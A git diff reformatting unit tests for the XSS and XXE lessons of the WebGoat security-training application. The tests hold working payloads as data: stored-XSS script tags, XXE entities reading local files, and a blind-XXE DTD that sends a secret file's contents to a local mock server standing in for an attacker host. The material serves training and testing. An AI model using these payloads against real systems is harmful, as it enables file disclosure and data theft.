diff --git a/src/test/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1Test.java b/src/test/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1Test.java
index f137c66d2..3f5f1d22e 100644
--- a/src/test/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1Test.java
@@ -23,6 +23,10 @@
 
 package org.owasp.webgoat.lessons.xss;
 
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
@@ -33,44 +37,36 @@ import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
 /**
- *
  * @author Angel Olle Blazquez
- *
  */
-
 @ExtendWith(MockitoExtension.class)
 class CrossSiteScriptingLesson1Test extends AssignmentEndpointTest {
 
-    private static final String CONTEXT_PATH = "/CrossSiteScripting/attack1";
+  private static final String CONTEXT_PATH = "/CrossSiteScripting/attack1";
 
-    @Autowired
-    private MockMvc mockMvc;
+  @Autowired private MockMvc mockMvc;
 
-    @BeforeEach
-    public void setup() {
-        CrossSiteScriptingLesson1 crossSiteScriptingLesson1 = new CrossSiteScriptingLesson1();
-        init(crossSiteScriptingLesson1);
-        mockMvc = standaloneSetup(crossSiteScriptingLesson1).build();
-    }
+  @BeforeEach
+  public void setup() {
+    CrossSiteScriptingLesson1 crossSiteScriptingLesson1 = new CrossSiteScriptingLesson1();
+    init(crossSiteScriptingLesson1);
+    mockMvc = standaloneSetup(crossSiteScriptingLesson1).build();
+  }
 
-    @Test
-    void success() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post(CONTEXT_PATH)
-            .param("checkboxAttack1", "value"))
-            .andExpect(status().isOk())
-            .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
-
-    @Test
-    void failure() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post(CONTEXT_PATH))
-            .andExpect(status().isOk())
-            .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
+  @Test
+  void success() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post(CONTEXT_PATH).param("checkboxAttack1", "value"))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
+  @Test
+  void failure() throws Exception {
+    mockMvc
+        .perform(MockMvcRequestBuilders.post(CONTEXT_PATH))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingTest.java b/src/test/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingTest.java
index 17163e109..77122ba95 100644
--- a/src/test/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingTest.java
@@ -22,56 +22,57 @@
 
 package org.owasp.webgoat.lessons.xss;
 
+import static org.mockito.Mockito.lenient;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
 import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.lessons.xss.CrossSiteScripting;
-import org.owasp.webgoat.lessons.xss.DOMCrossSiteScripting;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import static org.mockito.Mockito.lenient;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
-
 @ExtendWith(MockitoExtension.class)
 public class DOMCrossSiteScriptingTest extends AssignmentEndpointTest {
-    private MockMvc mockMvc;
-    private String randVal = "12034837";
+  private MockMvc mockMvc;
+  private String randVal = "12034837";
 
-    @BeforeEach
-    public void setup() {
-        DOMCrossSiteScripting domXss = new DOMCrossSiteScripting();
-        init(domXss);
-        this.mockMvc = standaloneSetup(domXss).build();
-        CrossSiteScripting xss = new CrossSiteScripting();
-        lenient().when(userSessionData.getValue("randValue")).thenReturn(randVal);
-    }
+  @BeforeEach
+  public void setup() {
+    DOMCrossSiteScripting domXss = new DOMCrossSiteScripting();
+    init(domXss);
+    this.mockMvc = standaloneSetup(domXss).build();
+    CrossSiteScripting xss = new CrossSiteScripting();
+    lenient().when(userSessionData.getValue("randValue")).thenReturn(randVal);
+  }
 
-    @Test
-    public void success() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/CrossSiteScripting/phone-home-xss")
+  @Test
+  public void success() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/CrossSiteScripting/phone-home-xss")
                 .header("webgoat-requested-by", "dom-xss-vuln")
                 .param("param1", "42")
                 .param("param2", "24"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.output", CoreMatchers.containsString("phoneHome Response is " + randVal)))
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
-    }
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.output", CoreMatchers.containsString("phoneHome Response is " + randVal)))
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void failure() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/CrossSiteScripting/phone-home-xss")
+  @Test
+  public void failure() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/CrossSiteScripting/phone-home-xss")
                 .header("webgoat-requested-by", "wrong-value")
                 .param("param1", "22")
                 .param("param2", "20"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
-    }
-
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/xss/StoredXssCommentsTest.java b/src/test/java/org/owasp/webgoat/lessons/xss/StoredXssCommentsTest.java
index a8db45a36..5c54a3157 100644
--- a/src/test/java/org/owasp/webgoat/lessons/xss/StoredXssCommentsTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xss/StoredXssCommentsTest.java
@@ -22,6 +22,10 @@
 
 package org.owasp.webgoat.lessons.xss;
 
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
@@ -35,62 +39,66 @@ import org.springframework.test.web.servlet.MvcResult;
 import org.springframework.test.web.servlet.ResultActions;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
-
-
 @ExtendWith(MockitoExtension.class)
 public class StoredXssCommentsTest extends AssignmentEndpointTest {
 
-    private MockMvc mockMvc;
+  private MockMvc mockMvc;
 
-    @BeforeEach
-    public void setup() {
-        StoredXssComments storedXssComments = new StoredXssComments();
-        init(storedXssComments);
-        this.mockMvc = standaloneSetup(storedXssComments).build();
-    }
+  @BeforeEach
+  public void setup() {
+    StoredXssComments storedXssComments = new StoredXssComments();
+    init(storedXssComments);
+    this.mockMvc = standaloneSetup(storedXssComments).build();
+  }
 
-    @Test
-    public void success() throws Exception {
-        ResultActions results = mockMvc.perform(MockMvcRequestBuilders.post("/CrossSiteScriptingStored/stored-xss")
-                .content("{\"text\":\"someTextHere<script>webgoat.customjs.phoneHome()</script>MoreTextHere\"}")
+  @Test
+  public void success() throws Exception {
+    ResultActions results =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post("/CrossSiteScriptingStored/stored-xss")
+                .content(
+                    "{\"text\":\"someTextHere<script>webgoat.customjs.phoneHome()</script>MoreTextHere\"}")
                 .contentType(MediaType.APPLICATION_JSON));
 
-        results.andExpect(status().isOk());
-        results.andExpect(jsonPath("$.lessonCompleted",CoreMatchers.is(true)));
-    }
+    results.andExpect(status().isOk());
+    results.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+  }
 
-    @Test
-    public void failure() throws Exception {
-        ResultActions results = mockMvc.perform(MockMvcRequestBuilders.post("/CrossSiteScriptingStored/stored-xss")
+  @Test
+  public void failure() throws Exception {
+    ResultActions results =
+        mockMvc.perform(
+            MockMvcRequestBuilders.post("/CrossSiteScriptingStored/stored-xss")
                 .content("{\"text\":\"someTextHere<script>alert('Xss')</script>MoreTextHere\"}")
                 .contentType(MediaType.APPLICATION_JSON));
 
-        results.andExpect(status().isOk());
-        results.andExpect(jsonPath("$.lessonCompleted",CoreMatchers.is(false)));
-    }
+    results.andExpect(status().isOk());
+    results.andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+  }
 
-    /* For the next two tests there is a comment seeded ...
-        comments.add(new Comment("secUriTy", DateTime.now().toString(fmt), "<script>console.warn('unit test me')</script>Comment for Unit Testing"));
-        ... the isEncoded method will remain commented out as it will fail (because WebGoat isn't supposed to be secure)
-     */
+  /* For the next two tests there is a comment seeded ...
+     comments.add(new Comment("secUriTy", DateTime.now().toString(fmt), "<script>console.warn('unit test me')</script>Comment for Unit Testing"));
+     ... the isEncoded method will remain commented out as it will fail (because WebGoat isn't supposed to be secure)
+  */
 
-    //Ensures it is vulnerable
-    @Test
-    public void isNotEncoded() throws Exception {
-        //do get to get comments after posting xss payload
-        ResultActions taintedResults = mockMvc.perform(MockMvcRequestBuilders.get("/CrossSiteScriptingStored/stored-xss"));
-        MvcResult mvcResult = taintedResults.andReturn();
-        assert(mvcResult.getResponse().getContentAsString().contains("<script>console.warn"));
-    }
+  // Ensures it is vulnerable
+  @Test
+  public void isNotEncoded() throws Exception {
+    // do get to get comments after posting xss payload
+    ResultActions taintedResults =
+        mockMvc.perform(MockMvcRequestBuilders.get("/CrossSiteScriptingStored/stored-xss"));
+    MvcResult mvcResult = taintedResults.andReturn();
+    assert (mvcResult.getResponse().getContentAsString().contains("<script>console.warn"));
+  }
 
-    //Could be used to test an encoding solution ... commented out so build will pass. Uncommenting will fail build, but leaving in as positive Security Unit Test
-//    @Test
-//    public void isEncoded() throws Exception {
-//        //do get to get comments after posting xss payload
-//        ResultActions taintedResults = mockMvc.perform(MockMvcRequestBuilders.get("/CrossSiteScripting/stored-xss"));
-//        taintedResults.andExpect(jsonPath("$[0].text",CoreMatchers.is(CoreMatchers.containsString("&lt;scriptgt;"))));
-//    }
+  // Could be used to test an encoding solution ... commented out so build will pass. Uncommenting
+  // will fail build, but leaving in as positive Security Unit Test
+  //    @Test
+  //    public void isEncoded() throws Exception {
+  //        //do get to get comments after posting xss payload
+  //        ResultActions taintedResults =
+  // mockMvc.perform(MockMvcRequestBuilders.get("/CrossSiteScripting/stored-xss"));
+  //
+  // taintedResults.andExpect(jsonPath("$[0].text",CoreMatchers.is(CoreMatchers.containsString("&lt;scriptgt;"))));
+  //    }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignmentTest.java
index ed50c4a7d..698755855 100644
--- a/src/test/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignmentTest.java
@@ -1,21 +1,5 @@
 package org.owasp.webgoat.lessons.xxe;
 
-import com.fasterxml.jackson.databind.ObjectMapper;
-import com.github.tomakehurst.wiremock.WireMockServer;
-import com.github.tomakehurst.wiremock.client.WireMock;
-import com.github.tomakehurst.wiremock.verification.LoggedRequest;
-import org.hamcrest.CoreMatchers;
-import org.hamcrest.Matchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.owasp.webgoat.container.plugins.LessonTest;
-import org.springframework.http.MediaType;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.setup.MockMvcBuilders;
-
-import java.io.File;
-import java.util.List;
-
 import static com.github.tomakehurst.wiremock.client.WireMock.aResponse;
 import static com.github.tomakehurst.wiremock.client.WireMock.getRequestedFor;
 import static com.github.tomakehurst.wiremock.client.WireMock.urlMatching;
@@ -26,129 +10,184 @@ import static org.springframework.test.web.servlet.request.MockMvcRequestBuilder
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
+import com.github.tomakehurst.wiremock.WireMockServer;
+import com.github.tomakehurst.wiremock.client.WireMock;
+import com.github.tomakehurst.wiremock.verification.LoggedRequest;
+import java.io.File;
+import java.util.List;
+import org.hamcrest.CoreMatchers;
+import org.hamcrest.Matchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.http.MediaType;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+import org.springframework.test.web.servlet.setup.MockMvcBuilders;
+
 class BlindSendFileAssignmentTest extends LessonTest {
 
-    private int port;
-    private WireMockServer webwolfServer;
+  private int port;
+  private WireMockServer webwolfServer;
 
-    @BeforeEach
-    public void setup() {
-        this.webwolfServer = new WireMockServer(options().dynamicPort());
-        webwolfServer.start();
-        this.port = webwolfServer.port();
-        when(webSession.getCurrentLesson()).thenReturn(new XXE());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    this.webwolfServer = new WireMockServer(options().dynamicPort());
+    webwolfServer.start();
+    this.port = webwolfServer.port();
+    when(webSession.getCurrentLesson()).thenReturn(new XXE());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    private int countComments() throws Exception {
-        var response = mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
-                .andExpect(status().isOk())
-                .andReturn();
-        return new ObjectMapper().reader().readTree(response.getResponse().getContentAsString()).size();
-    }
+  private int countComments() throws Exception {
+    var response =
+        mockMvc
+            .perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+            .andExpect(status().isOk())
+            .andReturn();
+    return new ObjectMapper().reader().readTree(response.getResponse().getContentAsString()).size();
+  }
 
-    private void containsComment(String expected) throws Exception {
-        mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.[*].text").value(Matchers.hasItem(expected)));
-    }
+  private void containsComment(String expected) throws Exception {
+    mockMvc
+        .perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
+        .andExpect(status().isOk())
+        .andExpect(jsonPath("$.[*].text").value(Matchers.hasItem(expected)));
+  }
 
-    @Test
-    public void validCommentMustBeAdded() throws Exception {
-        int nrOfComments = countComments();
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                        .content("<comment><text>test</text></comment>"))
+  @Test
+  public void validCommentMustBeAdded() throws Exception {
+    int nrOfComments = countComments();
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/blind")
+                .content("<comment><text>test</text></comment>"))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
+    assertThat(countComments()).isEqualTo(nrOfComments + 1);
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
-        assertThat(countComments()).isEqualTo(nrOfComments + 1);
-    }
+  @Test
+  public void wrongXmlShouldGiveErrorBack() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/blind")
+                .content("<comment><text>test</ext></comment>"))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))))
+        .andExpect(
+            jsonPath(
+                "$.output",
+                CoreMatchers.startsWith(
+                    "javax.xml.bind.UnmarshalException\\n"
+                        + " - with linked exception:\\n"
+                        + "[javax.xml.stream.XMLStreamException: ParseError at [row,col]:[1,22]\\n"
+                        + "Message:")));
+  }
 
-    @Test
-    public void wrongXmlShouldGiveErrorBack() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                        .content("<comment><text>test</ext></comment>"))
+  @Test
+  public void simpleXXEShouldNotWork() throws Exception {
+    File targetFile =
+        new File(webGoatHomeDirectory, "/XXE/" + webSession.getUserName() + "/secret.txt");
+    String content =
+        "<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM"
+            + " \"file:///%s\"> ]><comment><text>&root;</text></comment>";
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/blind")
+                .content(String.format(content, targetFile.toString())))
+        .andExpect(status().isOk());
+    containsComment("Nice try, you need to send the file to WebWolf");
+  }
 
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))))
-                .andExpect(jsonPath("$.output", CoreMatchers.startsWith("javax.xml.bind.UnmarshalException\\n - with linked exception:\\n[javax.xml.stream.XMLStreamException: ParseError at [row,col]:[1,22]\\nMessage:")));
-    }
+  @Test
+  public void solve() throws Exception {
+    File targetFile =
+        new File(webGoatHomeDirectory, "/XXE/" + webSession.getUserName() + "/secret.txt");
+    // Host DTD on WebWolf site
+    String dtd =
+        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
+            + "<!ENTITY % file SYSTEM \""
+            + targetFile.toURI().toString()
+            + "\">\n"
+            + "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"
+            + port
+            + "/landing?text=%file;'>\">\n"
+            + "%all;";
+    webwolfServer.stubFor(
+        WireMock.get(WireMock.urlMatching("/files/test.dtd"))
+            .willReturn(aResponse().withStatus(200).withBody(dtd)));
+    webwolfServer.stubFor(
+        WireMock.get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
 
-    @Test
-    public void simpleXXEShouldNotWork() throws Exception {
-        File targetFile = new File(webGoatHomeDirectory, "/XXE/" + webSession.getUserName() + "/secret.txt");
-        String content = "<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM \"file:///%s\"> ]><comment><text>&root;</text></comment>";
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                        .content(String.format(content, targetFile.toString())))
-                .andExpect(status().isOk());
-        containsComment("Nice try, you need to send the file to WebWolf");
-    }
+    // Make the request from WebGoat
+    String xml =
+        "<?xml version=\"1.0\"?>"
+            + "<!DOCTYPE comment ["
+            + "<!ENTITY % remote SYSTEM \"http://localhost:"
+            + port
+            + "/files/test.dtd\">"
+            + "%remote;"
+            + "]>"
+            + "<comment><text>test&send;</text></comment>";
+    performXXE(xml);
+  }
 
-    @Test
-    public void solve() throws Exception {
-        File targetFile = new File(webGoatHomeDirectory, "/XXE/" + webSession.getUserName() + "/secret.txt");
-        //Host DTD on WebWolf site
-        String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
-                "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
-                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:" + port + "/landing?text=%file;'>\">\n" +
-                "%all;";
-        webwolfServer.stubFor(WireMock.get(WireMock.urlMatching("/files/test.dtd"))
-                .willReturn(aResponse()
-                        .withStatus(200)
-                        .withBody(dtd)));
-        webwolfServer.stubFor(WireMock.get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
+  @Test
+  public void solveOnlyParamReferenceEntityInExternalDTD() throws Exception {
+    File targetFile =
+        new File(webGoatHomeDirectory, "/XXE/" + webSession.getUserName() + "/secret.txt");
+    // Host DTD on WebWolf site
+    String dtd =
+        "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
+            + "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"
+            + port
+            + "/landing?text=%file;'>\">\n";
+    webwolfServer.stubFor(
+        WireMock.get(WireMock.urlMatching("/files/test.dtd"))
+            .willReturn(aResponse().withStatus(200).withBody(dtd)));
+    webwolfServer.stubFor(
+        WireMock.get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
 
-        //Make the request from WebGoat
-        String xml = "<?xml version=\"1.0\"?>" +
-                "<!DOCTYPE comment [" +
-                "<!ENTITY % remote SYSTEM \"http://localhost:" + port + "/files/test.dtd\">" +
-                "%remote;" +
-                "]>" +
-                "<comment><text>test&send;</text></comment>";
-        performXXE(xml);
-    }
+    // Make the request from WebGoat
+    String xml =
+        "<?xml version=\"1.0\"?>"
+            + "<!DOCTYPE comment ["
+            + "<!ENTITY % file SYSTEM \""
+            + targetFile.toURI()
+            + "\">\n"
+            + "<!ENTITY % remote SYSTEM \"http://localhost:"
+            + port
+            + "/files/test.dtd\">"
+            + "%remote;"
+            + "%all;"
+            + "]>"
+            + "<comment><text>test&send;</text></comment>";
+    performXXE(xml);
+  }
 
-    @Test
-    public void solveOnlyParamReferenceEntityInExternalDTD() throws Exception {
-        File targetFile = new File(webGoatHomeDirectory, "/XXE/" + webSession.getUserName() + "/secret.txt");
-        //Host DTD on WebWolf site
-        String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
-                "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:" + port + "/landing?text=%file;'>\">\n";
-        webwolfServer.stubFor(WireMock.get(WireMock.urlMatching("/files/test.dtd"))
-                .willReturn(aResponse()
-                        .withStatus(200)
-                        .withBody(dtd)));
-        webwolfServer.stubFor(WireMock.get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200)));
+  private void performXXE(String xml) throws Exception {
+    // Call with XXE injection
+    mockMvc
+        .perform(MockMvcRequestBuilders.post("/xxe/blind").content(xml))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
 
-        //Make the request from WebGoat
-        String xml = "<?xml version=\"1.0\"?>" +
-                "<!DOCTYPE comment [" +
-                "<!ENTITY % file SYSTEM \"" + targetFile.toURI() + "\">\n" +
-                "<!ENTITY % remote SYSTEM \"http://localhost:" + port + "/files/test.dtd\">" +
-                "%remote;" +
-                "%all;" +
-                "]>" +
-                "<comment><text>test&send;</text></comment>";
-        performXXE(xml);
-    }
-
-    private void performXXE(String xml) throws Exception {
-        //Call with XXE injection
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                        .content(xml))
-
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.not.solved"))));
-
-        List<LoggedRequest> requests = webwolfServer.findAll(getRequestedFor(urlMatching("/landing.*")));
-        assertThat(requests.size()).isEqualTo(1);
-        String text = requests.get(0).getQueryParams().get("text").firstValue();
-
-        //Call with retrieved text
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind")
-                        .content("<comment><text>" + text + "</text></comment>"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
-    }
+    List<LoggedRequest> requests =
+        webwolfServer.findAll(getRequestedFor(urlMatching("/landing.*")));
+    assertThat(requests.size()).isEqualTo(1);
+    String text = requests.get(0).getQueryParams().get("text").firstValue();
 
+    // Call with retrieved text
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/blind")
+                .content("<comment><text>" + text + "</text></comment>"))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
+  }
 }
diff --git a/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java
index 0e42b26e6..c258c5080 100644
--- a/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xxe/ContentTypeAssignmentTest.java
@@ -22,6 +22,11 @@
 
 package org.owasp.webgoat.lessons.xxe;
 
+import static org.mockito.Mockito.when;
+import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+
 import com.fasterxml.jackson.databind.ObjectMapper;
 import org.hamcrest.CoreMatchers;
 import org.hamcrest.Matchers;
@@ -30,77 +35,96 @@ import org.junit.jupiter.api.Test;
 import org.owasp.webgoat.container.plugins.LessonTest;
 import org.springframework.http.MediaType;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-import org.springframework.test.web.servlet.result.MockMvcResultHandlers;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
-import static org.mockito.Mockito.when;
-import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.get;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-
 /**
  * @author nbaars
  * @since 11/2/17.
  */
 public class ContentTypeAssignmentTest extends LessonTest {
 
-    @BeforeEach
-    public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(new XXE());
-        this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
-    }
+  @BeforeEach
+  public void setup() {
+    when(webSession.getCurrentLesson()).thenReturn(new XXE());
+    this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
+  }
 
-    @Test
-    public void sendingXmlButContentTypeIsJson() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/content-type")
+  @Test
+  public void sendingXmlButContentTypeIsJson() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/content-type")
                 .contentType(MediaType.APPLICATION_JSON)
-                .content("<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM \"file:///\"> ]><comment><text>&root;</text></comment>"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
-    }
+                .content(
+                    "<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root"
+                        + " SYSTEM \"file:///\"> ]><comment><text>&root;</text></comment>"))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
+  }
 
-    @Test
-    public void workingAttack() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/content-type")
+  @Test
+  public void workingAttack() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/content-type")
                 .contentType(MediaType.APPLICATION_XML)
-                .content("<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root SYSTEM \"file:///\"> ]><comment><text>&root;</text></comment>"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
-    }
+                .content(
+                    "<?xml version=\"1.0\" standalone=\"yes\" ?><!DOCTYPE user [<!ENTITY root"
+                        + " SYSTEM \"file:///\"> ]><comment><text>&root;</text></comment>"))
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("assignment.solved"))));
+  }
 
-    @Test
-    public void postingJsonShouldAddComment() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/xxe/content-type")
+  @Test
+  public void postingJsonShouldAddComment() throws Exception {
+    mockMvc
+        .perform(
+            MockMvcRequestBuilders.post("/xxe/content-type")
                 .contentType(MediaType.APPLICATION_JSON)
                 .content("{  \"text\" : \"Hello World\"}"))
-                .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
+        .andExpect(status().isOk())
+        .andExpect(
+            jsonPath(
+                "$.feedback",
+                CoreMatchers.is(messages.getMessage("xxe.content.type.feedback.json"))));
 
-        mockMvc.perform(get("/xxe/comments").contentType(MediaType.APPLICATION_JSON))
-                .andExpect(status().isOk())
